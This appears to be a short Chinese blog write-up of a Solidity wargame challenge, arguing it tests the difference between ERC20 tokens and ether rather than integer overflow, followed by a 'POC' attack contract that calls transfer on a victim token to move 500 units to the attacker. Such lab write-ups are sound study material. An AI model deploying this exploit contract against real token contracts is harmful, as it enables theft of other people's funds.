赞
踩
题意理解:一开始觉得题目考察的是整型溢出漏洞(虽然该漏洞在该合约中确实存在),但后来发现并非如此,个人觉得本题更倾向于考察对ERC20代币和以太坊主币的区分
以下是本题的POC合约:
- // SPDX-License-Identifier: MIT
- pragma solidity ^0.8.0;
-
- interface Token {
- function transfer(address _to, uint _value) external returns (bool);
- function balanceOf(address _owner) external view returns (uint balance);
-
-
- }
-
-
- contract POC {
- address public owner;
- address public victim;
-
- constructor(){
- owner = msg.sender;
- }
-
- function setVictim(address victim_) public {
- victim =victim_;
- }
-
-
- function attack () public {
- Token token = Token(victim);
- token.transfer(owner , 500);
- }
- }
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。